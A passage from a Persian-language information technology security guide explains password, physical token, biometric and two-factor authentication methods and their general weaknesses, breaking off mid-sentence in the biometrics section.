ﺩﺭﻋﻮﺽ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺴﺒﻲ ﺯﻳﺎﺩﻱ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ .ﺍﻓﺮﺍﺩ ﺑﺎﺗﺠﺮﺑﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﻣﻌﻤـﻮ ﹰ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ "ﭼﻴﺰﻱ ﻛﻪ ﻣﻲﺩﺍﻧﻴﺪ"" ،ﭼﻴﺰﻱ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ" ،ﻭ ﻳﺎ "ﺁﻧﭽﻪ ﻛﻪ ﻫﺴﺘﻴﺪ" ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ .ﺑﺨـﺸﻬﺎﻱ ﺑﻌـﺪﻱ ﺍﻳـﻦ
ﺳﻪ ﺭﻭﺵ ﺳﻨﺘﻲ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﻨﺪ ،ﺩﺭ ﻛﻨﺎﺭ ﻳﻚ ﺭﻭﺵ ﺟﺪﻳﺪﺗﺮ" :ﺟﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻳﺪ".
ﺳﻴﺴﺘﻢﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ :ﭼﻴﺰﻱ ﻛﻪ ﻣﻲﺩﺍﻧﻴﺪ
ﺍﺑﺘﺪﺍﻳﻲﺗﺮﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻫﻢ ﺑﺮ ﺍﺳﺎﺱ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭ ﻣﻲﻛﺮﺩﻧﺪ .ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻫﺮ ﻛﺎﺭﺑﺮ ﺳﻴﺴﺘﻢ ﻳﻚ ﺷﻨﺎﺳـﺔ
ﻛﺎﺭﺑﺮﻱ ﻭ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ؛ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺧﻮﺩ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻓﻲ ﺍﺳﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺗﺎﻳﭗ ﻛﻨﻴﺪ .ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺗﺎﻳﭗﺷﺪﻩ ﺑـﺎ
ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﻫﻤﺨﻮﺍﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻓﺮﺽ ﺑﺮ ﺁﻥ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻓﺮﺩ ﻫﻤﺎﻥ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ.
ﭼﻮﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﻪ ﻫﻴﭻ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ ،ﻫﻤﭽﻨـﺎﻥ ﭘـﺮ ﺍﺳـﺘﻔﺎﺩﻩﺗـﺮﻳﻦ
ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺟﻬﺎﻥ ﺍﻣﺮﻭﺯ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ .ﺩﺭﻧﺘﻴﺠﺔ ﺍﻳﻦ ﺭﻭﺍﺝ ﺯﻳﺎﺩ ،ﺍﻛﺜﺮ ﻣـﺎ ﺍﻛﻨـﻮﻥ ﺩﻫﻬـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﺩﺍﺭﻳﻢ ﻛﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻪﺭﻭﺯﻩ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻳﺎﺩ ﺑﻴﺎﻭﺭﻳﻢ؛ ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ )PINﻫﺎ( ١٢٦،ﺭﻣﺰﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻛﺎﺭﺗﻬـﺎﻱ
،ATMﻛﺎﺭﺗﻬﺎﻱ ﺗﻤﺎﺱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ ﻭ ﻣﺎﺷﻴﻨﻬﺎﻱ ﭘﺎﺳـﺨﮕﻮ ،ﺑـﺎﺯﻛﺮﺩﻥ ﻗﻔـﻞ ﺗﻠﻔﻨﻬـﺎﻱ ﺳـﻴﺎﺭ ،ﺑـﺎﺯﻛﺮﺩﻥ ﻗﻔـﻞ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ،ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺳﺮﻭﻳﺲ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻠﻔﻨﻲ ،ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ.
ﭼﻨﺪﻳﻦ ﻣﺸﻜﻞ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻗﺎﺑﻞ ﺭﻓﻊ ﻧﻴﺴﺘﻨﺪ ،ﮐﻪ ﺩﺭ ﺻﻔﺤﺔ ﻣﻘﺎﺑﻞ ﺁﻣﺪﻩﺍﻧﺪ.
•
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺗﻮﺯﻳﻊ ﺷﻮﻧﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺩﺭ ﺍﻭﻟـﻴﻦ ﻭﺭﻭﺩ
ﻻ ﭘﻴﺶﻓﺮﺿﻬﺎ ﺩﺳﺖﻧﺨﻮﺭﺩﻩ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ ﻭ ﻧﻴـﺰ ﻣﻤﻜـﻦ
ﻛﺎﺭﺑﺮ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺟﺎﺯﻩ ﺩﻫﻨﺪ ﺗﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﺪ ،ﻭﻟﻲ ﻣﻌﻤﻮ ﹰ
ﺍﺳﺖ ﺍﻭﻟﻴﻦ ﻛﺎﺭﺑﺮ ،ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﻧﺒﺎﺷﺪ.
•
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ ﺩﺯﺩﻳﺪﻩ ﺷﻮﻧﺪ .ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﻳـﻦ
ﺧﻄﺮ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﺪ ،ﻭﻟﻲ ﺍﮔﺮ ﺷﺨﺼﻲ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﻭﺍﺭﺩ ﻛﻨﺪ ﻭ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﺍﺯ ﺑـﺎﻻﻱ
ﺷﺎﻧﺔ ﺍﻭ ﺁﻧﺮﺍ ﺑﺒﻴﻨﺪ ،ﺁﻧﮕﺎﻩ ﻫﻴﭻ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﺭﻣﺰﻱﺳﺎﺯﻱ ﺍﻳﻦ ﺷﻤﺎﺭﻩ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺁﻥ ﻓﺮﺩ ﻧﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺍﺯ ﺣﺎﻟﺖ ﺭﻣﺰ ﺩﺭ ﺑﻴـﺎﻭﺭﺩ ﻭﺟـﻮﺩ
ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ!
126 Personal Identification Numbers
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣١٥
•
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﺑﺮﺍﺣﺘﻲ ﻓﺮﺍﻣﻮﺵ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻓﺮﺍﺩ ﺁﻧﻬﺎ ﺭﺍ ﻳﺎﺩﺩﺍﺷﺖ ﻛﻨﻨـﺪ ،ﺑـﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻛﺎﺭﺑﺮﺩﻫﺎ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺎﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﻩﺗﺮﻱ ﺍﻧﺘﺨﺎﺏ ﻧﻤﺎﻳﻨﺪ ،ﻭ ﻳﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺎﻣﻨﺎﺳﺐ ﻛﻪ ﺑﺮﺍﺣﺘﻲ ﻗﺎﺑﻞ
ﺣﺪﺱ ﻫﺴﺘﻨﺪ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻧﺪ.
•
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﻮﻧﺪ ،ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺟﺎﺯﻩ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﻧﺒﺎﻳـﺪ،
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﻧﺸﺎﻥﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ :١٢٧ﭼﻴﺰﻱ ﻛﻪ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ
ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﻛﻪ ﺍﻓﺮﺍﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺁﻥ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺛﺒﺎﺕ ﻛﻨﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺸﺎﻧﻬﺎ ﺍﺳﺖ -ﺍﺷﻴﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﺁﻧﻬﺎ ﺑﻪ
ﻧﻮﻋﻲ ﻫﻮﻳﺖ ﺭﺍ ﺍﺛﺒﺎﺕ ﻣﻲﻛﻨﺪ .ﻛﻠﻴﺪ ﺩﺭﻫﺎﻱ ﻭﺭﻭﺩﻱ ﺑﺮﺍﻱ ﻗﺮﻧﻬﺎ ﺑﻌﻨﻮﺍﻥ ﻧﺸﺎﻧﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ؛ ﺩﺭ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺟﺪﻳﺪ ،ﻛﻠﻴﺪﻫﺎﻱ ﻓﻠﺰﻱ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﺭﺗﻲ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳـﺎ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﻓﺮﻛـﺎﻧﺲ ﺭﺍﺩﻳـﻮﻳﻲ ﺗﻜﻤﻴـﻞ ﺷـﺪﻩﺍﻧـﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺗﻲ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪﻱ ﻓﻠﺰﻱ ﺍﺭﺟﺤﻴﺖ ﺩﺍﺭﻧﺪ ،ﭼﻮﻥ ﻫﺮ ﻛﺎﺭﺕ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺷﻤﺎﺭﺓ ﻳﻜﺘﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑـﻪ
ﻳﻚ ﻫﻮﻳﺖ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺳﻴﺴﺘﻢ ﺩﺭ ﻋﻤﻞ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻛﺎﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ ﺗﺎ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﺩﺭﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺭﺍ ﺑـﺎﺯ
ﻼ ﻛﺎﺭﺕ ﻳﻚ ﻣﻨﺸﻲ ﺳﻄﺢ ﭘﺎﺋﻴﻦ ﻧﺘﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺩﺭ
ﻛﻨﺪ .ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺯﻣﺎﻧﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺍﺿﺎﻓﻪ ﻛﺮﺩ ،ﺑﻄﻮﺭﻳﻜﻪ ﻣﺜ ﹰ
ﺳﺎﻋﺎﺕ ﻏﻴﺮ ﺍﺩﺍﺭﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻬﺎ ﺧﻂﻣﺸﻲ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧﺪ :ﭼﻮﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺧـﻮﺩ ﺑـﻪ
ﻛﺎﺭﺗﻬﺎﻳﺸﺎﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ،ﺑﻪ ﺳﺮﻋﺖ ﻛﺎﺭﺗﻬﺎﻳﻲ ﻛﻪ ﮔﻢ ﺷﺪﻩ ﻳﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪﺍﻧـﺪ ﺭﺍ ﮔـﺰﺍﺭﺵ ﻣـﻲﺩﻫﻨـﺪ؛ ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﻳـﻚ ﻛـﺎﺭﺕ ﺑﻌﻨـﻮﺍﻥ
ﻻ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﮔﺮﺩﺩ ﻭ ﺑﺴﺎﺩﮔﻲ ﻳﻚ ﻛﺎﺭﺕ ﺟﺪﻳﺪ ﺑﻪ ﺩﺍﺭﻧﺪﻩ ﺁﻥ ﺗﻌﻠﻖ ﻣﻲﮔﻴﺮﺩ .ﺍﻳﻦ ﻳﻚ ﺑﻬﺒﻮﺩ ﺑـﺮﺍﻱ
"ﮔﻤﺸﺪﻩ" ﺩﺭ ﺳﻴﺴﺘﻢ ﺛﺒﺖ ﺷﺪ ﻣﻌﻤﻮ ﹰ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺍﺳﺖ ،ﻛﻪ ﺩﺭ ﺁﻥ ﺍﻓﺮﺍﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻛﺪﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺪﻭﻥ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ ﺩﺳﺘﺮﺳـﻲ
ﺧﻮﺩ ،ﻣﻴﺎﻥ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ.
ﻣﺸﺎﺑﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﻣﺸﻜﻼﺗﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
• ﻧﺸﺎﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺛﺎﺑﺖ ﻧﻤﻲﻛﻨﻨﺪ ﻛﻪ ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ .ﻫﺮ ﻛﺲ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﻣﺎﻟﻜﻴﺖ ﻧﺸﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧـﺪ
ﺑﻪ ﻣﻨﻄﻘﺔ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ؛
• ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻧﺸﺎﻥ ﺭﺍ ﮔﻢ ﻛﻨﺪ ﺩﻳﮕﺮ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻨﻄﻘﺔ ﻣﺤﺪﻭﺩﺷﺪﻩ ﻭﺍﺭﺩ ﺷﻮﺩ ،ﺣﺘﻲ ﺍﮔﺮ ﻫﻮﻳﺖ ﻭﻱ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﺪ؛ ﻭ
• ﺑﻌﻀﻲ ﺍﺯ ﻧﺸﺎﻧﻬﺎ ﺑﻪ ﺁﺳﺎﻧﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻳﺎ ﺟﻌﻞ ﻣﻲﺷﻮﻧﺪ.
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ :ﺁﻧﭽﻪ ﻛﻪ ﺷﻤﺎ ﻫﺴﺘﻴﺪ
ﺳﻮﻣﻴﻦ ﺗﻜﻨﻴﻚ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﻮﺳﻴﻠﺔ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺟﻬﺖ ﺗﻌﻴﻴﻦ ﻫﻮﻳﺖ ﺍﻓﺮﺍﺩ ﺭﻓﺘﻪﺭﻓﺘﻪ ﺭﻭﺍﺝ ﺑﻴـﺸﺘﺮﻱ ﭘﻴـﺪﺍ ﻣـﻲﻛﻨـﺪ ﺗﻬﻴـﺔ ﻳـﻚ ﻣﻌﻴـﺎﺭ
ﻼ ﺍﺯ ﻭﻱ ﺛﺒﺖ ﺷﺪﻩ .ﺍﻳﻦ ﺗﻜﻨﻴﻚ ،ﻣﻌﻴﺎﺭ ﺯﻳﺴﺘﻲ )ﺑﻴﻮﻣﺘﺮﻳﻚ( ١٢٨ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ،
ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺷﺨﺺ ﻭ ﻣﻘﺎﻳﺴﻪ ﺁﻥ ﺑﺎ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻗﺒ ﹰ
127 Physical Tokens
128 Biometric
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺍﻓﺮﺍﺩ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻧﻤﻲﻛﻨﻨﺪ ،ﺑﻠﻜﻪ ﻧﺸﺎﻧﻬﺎ ﺭﺍ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻣﻲﻧﻤﺎﻳﻨـﺪ .ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ
ﻻ ﺳﻴـﺴﺘﻢ ﻧـﺸﺎﻧﻬﺎ ﺑـﺎ
ﺑﻮﻳﮋﻩ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺸﺎﻥ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ ﻣﺸﻜﻞﺳﺎﺯ ﻣﻲﺷﻮﺩ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺍﻳﻤـﻦ ﻣﻌﻤـﻮ ﹰ
ﻻ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭ ﻋﺎﻣﻠﻲ" ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴـﺮﺩ.
ﺑﻌﻀﻲ ﺍﺯ ﺍﺑﺰﺍﺭ ﺩﻳﮕﺮ ﺷﻨﺎﺳﺎﻳﻲ ﺁﻣﻴﺨﻪ ﻣﻲﺷﻮﺩ ﮐﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻌﻤﻮ ﹰ
ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺍﺗﺎﻕ ﻳﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻫﻢ ﻳﻚ ﻧﺸﺎﻥ ﺍﺭﺍﺋﻪ ﻛﻨﻴﺪ ﻭ ﻫﻢ ﻳﻚ ﺭﻣﺰ ﺗـﺼﺪﻳﻖ ﺍﻋﺘﺒـﺎﺭ
ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﻤﺎﻳﻴﺪ .ﺍﻳﻦ ﺗﻜﻨﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺗـﺸﺨﻴﺺ ﺻـﺎﺣﺒﺎﻥ ﺣـﺴﺎﺑﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﮐﻨﻨﺪ.
٣١٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﭼﻮﻥ ﺑﺮ ﺍﺳﺎﺱ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﭼﻴﺰﻱ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺷﺨﺺ ﺯﻧﺪﻩ ﺍﺳﺖ .ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠﻔـﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ،ﻣﺜـﻞ
ﺗﺼﺎﻭﻳﺮ ﺻﻮﺭﺕ ،ﺷﺒﻜﻴﻪ ،ﻋﻨﺒﻴﻪ ،ﺍﺛﺮ ﺍﻧﮕﺸﺖ ،ﺷﻜﻞ ﻫﻨﺪﺳﻲ ﺩﺳﺖ ،ﺣﺎﻟﺖ ﺻﺪﺍ ،ﺩﺳﺘﺨﻂ ،ﻣﺸﺨﺼﺎﺕ ﺗﺎﻳﭗ ،ﻭ ﻳﺎ ﺍﻟﮕﻮﻫﺎﻱ .DNA
ﻓﻨﻮﻥ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﻫﺮ ﺩﻭ ﻣﻮﺭﺩ "ﺗﺸﺨﻴﺺ ﺑﻌﺪﻱ" ﻭ ﻧﻴﺰ "ﺗﺸﺨﻴﺺ ﻗﻄﻌـﻲ" ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨﻮﻥ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺑﻌﺪﻱ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ :ﺍﻭﻟﻴﻦ ﺑﺎﺭﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﻣـﻲﺷـﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﺑﻴﻮﻣﺘﺮﻳـﻚ ﺍﻭ ﺛﺒـﺖ
